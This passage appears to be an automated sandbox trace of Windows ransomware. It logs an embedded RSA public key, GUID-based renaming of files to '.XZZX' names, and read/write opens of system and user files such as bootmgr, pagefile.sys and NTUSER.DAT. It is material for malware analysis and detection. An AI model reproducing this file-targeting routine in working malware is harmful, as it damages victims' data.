| out: param_1="\\\\?\\C:\\B0AD3AB92537B4FBFE37930729309943.XZZX") returned 44 [0160.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0160.222] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\D0146CD8033D1B5C8900E8C405D7FFA4.XZZX") returned 44 [0160.222] StrStrW (lpFirst="B0AD3AB92537B4FBFE37930729309943.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 528 os_tid = 0xbac [0160.375] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0160.375] lstrcpyW (in: lpString1=0x29af460, lpString2="bootmgr" | out: lpString1="bootmgr") returned="bootmgr" [0160.375] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\" | out: lpString1="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0160.375] SetErrorMode (uMode=0x1) returned 0x1 [0160.375] lstrcpyW (in: lpString1=0x29af860, lpString2="bootmgr" | out: lpString1="bootmgr") returned="bootmgr" [0160.375] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x1e64d72e, Data2=0xc138, Data3=0x4118, Data4=([0]=0x9f, [1]=0x3e, [2]=0x67, [3]=0x8d, [4]=0x7e, [5]=0x7a, [6]=0x2a, [7]=0xec))) returned 0x0 [0160.375] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\bootmgr") returned 14 [0160.375] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0160.375] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\AC48C010312155401E64D72E33BC3988.XZZX") returned 44 [0160.375] StrStrW (lpFirst="bootmgr", lpSrch="XZZX") returned 0x0 [0160.375] SetFileAttributesW (lpFileName="\\\\?\\C:\\bootmgr", dwFileAttributes=0x20) returned 0 [0160.375] CreateFileW (lpFileName="\\\\?\\C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 529 os_tid = 0xbb0 [0160.531] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0160.531] lstrcpyW (in: lpString1=0x29af460, lpString2="hiberfil.sys" | out: lpString1="hiberfil.sys") returned="hiberfil.sys" [0160.531] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\" | out: lpString1="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0160.531] SetErrorMode (uMode=0x1) returned 0x1 [0160.531] lstrcpyW (in: lpString1=0x29af860, lpString2="hiberfil.sys" | out: lpString1="hiberfil.sys") returned="hiberfil.sys" [0160.532] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x41cd87a1, Data2=0x6aed, Data3=0x4f3d, Data4=([0]=0xba, [1]=0xbf, [2]=0x28, [3]=0x38, [4]=0xda, [5]=0xd1, [6]=0x77, [7]=0x81))) returned 0x0 [0160.532] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\hiberfil.sys") returned 19 [0160.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0160.532] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\056F3A0D21189D7941CD87A123B381C1.XZZX") returned 44 [0160.532] StrStrW (lpFirst="hiberfil.sys", lpSrch="XZZX") returned 0x0 [0160.532] SetFileAttributesW (lpFileName="\\\\?\\C:\\hiberfil.sys", dwFileAttributes=0x20) returned 0 [0160.532] CreateFileW (lpFileName="\\\\?\\C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 530 os_tid = 0xbb4 [0160.687] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0160.687] lstrcpyW (in: lpString1=0x29af460, lpString2="pagefile.sys" | out: lpString1="pagefile.sys") returned="pagefile.sys" [0160.687] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\" | out: lpString1="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0160.687] SetErrorMode (uMode=0x1) returned 0x1 [0160.687] lstrcpyW (in: lpString1=0x29af860, lpString2="pagefile.sys" | out: lpString1="pagefile.sys") returned="pagefile.sys" [0160.687] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0xc9bd1623, Data2=0x4ece, Data3=0x4a3f, Data4=([0]=0xa7, [1]=0xf6, [2]=0x43, [3]=0x7d, [4]=0x4, [5]=0x77, [6]=0xa5, [7]=0x98))) returned 0x0 [0160.687] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\pagefile.sys") returned 19 [0160.687] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0160.687] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\F2E67A2A16DAF0B2C9BD16231975D4FA.XZZX") returned 44 [0160.687] StrStrW (lpFirst="pagefile.sys", lpSrch="XZZX") returned 0x0 [0160.687] SetFileAttributesW (lpFileName="\\\\?\\C:\\pagefile.sys", dwFileAttributes=0x20) returned 0 [0160.687] CreateFileW (lpFileName="\\\\?\\C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 531 os_tid = 0xbb8 [0160.864] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0160.864] lstrcpyW (in: lpString1=0x29af460, lpString2="D2D9507033A5E4DB82B20D90383EC923.XZZX" | out: lpString1="D2D9507033A5E4DB82B20D90383EC923.XZZX") returned="D2D9507033A5E4DB82B20D90383EC923.XZZX" [0160.864] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\" | out: lpString1="\\\\?\\C:\\Users\\") returned="\\\\?\\C:\\Users\\" [0160.864] SetErrorMode (uMode=0x1) returned 0x1 [0160.864] lstrcpyW (in: lpString1=0x29af860, lpString2="D2D9507033A5E4DB82B20D90383EC923.XZZX" | out: lpString1="D2D9507033A5E4DB82B20D90383EC923.XZZX") returned="D2D9507033A5E4DB82B20D90383EC923.XZZX" [0160.864] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x1ee8d6ab, Data2=0xf522, Data3=0x46e9, Data4=([0]=0xbc, [1]=0xfc, [2]=0x2f, [3]=0x71, [4]=0x61, [5]=0xb7, [6]=0x96, [7]=0xe0))) returned 0x0 [0160.865] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\D2D9507033A5E4DB82B20D90383EC923.XZZX") returned 50 [0160.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0160.865] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\F05E29B643E667F21EE8D6AB46814C3A.XZZX") returned 50 [0160.865] StrStrW (lpFirst="D2D9507033A5E4DB82B20D90383EC923.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 532 os_tid = 0xbbc [0161.033] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0161.033] lstrcpyW (in: lpString1=0x29af460, lpString2="97978E0428D9BCBB43314AFC2CD2A103.XZZX" | out: lpString1="97978E0428D9BCBB43314AFC2CD2A103.XZZX") returned="97978E0428D9BCBB43314AFC2CD2A103.XZZX" [0161.033] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0161.033] SetErrorMode (uMode=0x1) returned 0x1 [0161.033] lstrcpyW (in: lpString1=0x29af860, lpString2="97978E0428D9BCBB43314AFC2CD2A103.XZZX" | out: lpString1="97978E0428D9BCBB43314AFC2CD2A103.XZZX") returned="97978E0428D9BCBB43314AFC2CD2A103.XZZX" [0161.033] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0xd729693f, Data2=0xa74, Data3=0x44ae, Data4=([0]=0xbf, [1]=0xdf, [2]=0xaa, [3]=0x18, [4]=0xee, [5]=0xd8, [6]=0xd6, [7]=0x82))) returned 0x0 [0161.033] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\97978E0428D9BCBB43314AFC2CD2A103.XZZX") returned 71 [0161.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0161.033] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\1CE0268C02CDEAD8D729693F0568CF20.XZZX") returned 71 [0161.033] StrStrW (lpFirst="97978E0428D9BCBB43314AFC2CD2A103.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 533 os_tid = 0xbc0 [0161.186] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0161.186] lstrcpyW (in: lpString1=0x29af460, lpString2="DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX" | out: lpString1="DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX") returned="DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX" [0161.186] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0161.186] SetErrorMode (uMode=0x1) returned 0x1 [0161.186] lstrcpyW (in: lpString1=0x29af860, lpString2="DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX" | out: lpString1="DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX") returned="DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX" [0161.186] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x25a131ff, Data2=0xf847, Data3=0x466e, Data4=([0]=0x89, [1]=0x37, [2]=0xe6, [3]=0x81, [4]=0x6d, [5]=0x7f, [6]=0x5c, [7]=0xce))) returned 0x0 [0161.186] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX") returned 71 [0161.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0161.186] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\9823E5B9444E188225A131FF46E8FCCA.XZZX") returned 71 [0161.187] StrStrW (lpFirst="DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 534 os_tid = 0xbc4 [0161.342] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0161.344] lstrcpyW (in: lpString1=0x29af460, lpString2="NTUSER.DAT" | out: lpString1="NTUSER.DAT") returned="NTUSER.DAT" [0161.344] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0161.345] SetErrorMode (uMode=0x1) returned 0x1 [0161.345] lstrcpyW (in: lpString1=0x29af860, lpString2="NTUSER.DAT" | out: lpString1="NTUSER.DAT") returned="NTUSER.DAT" [0161.345] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x7cab5ed3, Data2=0xcdc6, Data3=0x4438, Data4=([0]=0xa1, [1]=0x7d, [2]=0x28, [3]=0xc3, [4]=0x24, [5]=0xe, [6]=0x76, [7]=0xe6))) returned 0x0 [0161.345] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT") returned 44 [0161.345] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0161.345] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\A77A4E3236D59B507CAB5ED339707F98.XZZX") returned 71 [0161.345] StrStrW (lpFirst="NTUSER.DAT", lpSrch="XZZX") returned 0x0 [0161.345] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", dwFileAttributes=0x20) returned 1 [0161.345] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 535 os_tid = 0xbc8 [0161.498] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0161.498] lstrcpyW (in: lpString1=0x29af460, lpString2="ntuser.dat.LOG1" | out: lpString1="ntuser.dat.LOG1") returned="ntuser.dat.LOG1" [0161.498] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0161.498] SetErrorMode (uMode=0x1) returned 0x1 [0161.498] lstrcpyW (in: lpString1=0x29af860, lpString2="ntuser.dat.LOG1" | out: lpString1="ntuser.dat.LOG1") returned="ntuser.dat.LOG1" [0161.498] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0xd515d514, Data2=0x15bc, Data3=0x47bd, Data4=([0]=0x8b, [1]=0x61, [2]=0x84, [3]=0xcc, [4]=0x7d, [5]=0x6, [6]=0x60, [7]=0x32))) returned 0x0 [0161.498] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1") returned 49 [0161.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0161.498] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\46831EB006172FCCD515D51408B21414.XZZX") returned 71 [0161.498] StrStrW (lpFirst="ntuser.dat.LOG1", lpSrch="XZZX") returned 0x0 [0161.498] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1", dwFileAttributes=0x20) returned 1 [0161.499] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 536 os_tid = 0xbcc [0161.654] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV 